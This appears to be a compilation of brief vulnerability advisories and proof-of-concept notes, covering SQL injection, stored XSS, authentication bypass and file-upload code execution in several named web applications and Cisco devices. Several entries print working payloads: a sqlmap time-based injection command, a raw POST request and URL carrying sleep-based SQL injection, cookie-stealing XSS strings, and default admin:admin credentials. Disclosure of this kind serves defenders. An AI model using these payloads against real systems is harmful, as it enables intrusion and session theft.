Login in the application and go to clientStatus.php?client_id= and use sqlmap -u http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1 to exploit the vulnerability.
XWiki 12.10.2 allows XSS via an SVG document to the upload feature of the comment section.
An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.
This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. HTTP requests made to the 'Active Sessions' section which can be accessed by root/admin user, can be performed without the need for any session(cookie) information. Therefore, the session cookie informations of the active users in the application can be read from the response content. A new authorized user can be created with the obtained cookie.
E-Learning System 1.0 is vulnerable to authentication bypass and remote code execution. An attacker can bypass authentication by using SQL injection and can execute arbitrary code by using the vulnerable add_post.php page.
Go to sign up page. In the "Last Name" field, use the following XSS payload "><img src=xx onerror=alert(document.cookie)> as the name and click on save. This should trigger the Stored XSS payload in admin panel users tab, once the admin login into the application to verify the registered users email address. The attacker steals the admin session cookie.
EyesOfNetwork 5.3 is vulnerable to a remote code execution vulnerability due to an arbitrary file upload. An attacker can exploit this vulnerability by uploading a malicious file to the server and then executing it. This can be done by using the curl command to upload the file and then using the curl command to execute it. The attacker can then start a listener on their machine to receive the output of the malicious file.
The 'person' parameter is vulnerable to time-based SQL Injection. Using Burp Suite, send the following POST request: POST /marimar/index.php?p=booking HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/marimar/index.php?p=booking Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc Upgrade-Insecure-Requests: 1 arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0
Vulnerable to SQL Injection. The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection. Payload: (select*from(select(sleep(10)))a) Proof of Concept: http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)
The room 'description' parameter is vulnerable to stored Cross-site Scripting. Login with administrator credentials at http://localhost/admin with admin:admin and click on 'Rooms' tab. Edit 'description' parameter with 1<script>alert('document.cookie')</script> and any user at http://localhost/marimar/index.php will get the XSS pop-up warning with their cookie values.
Services By CQR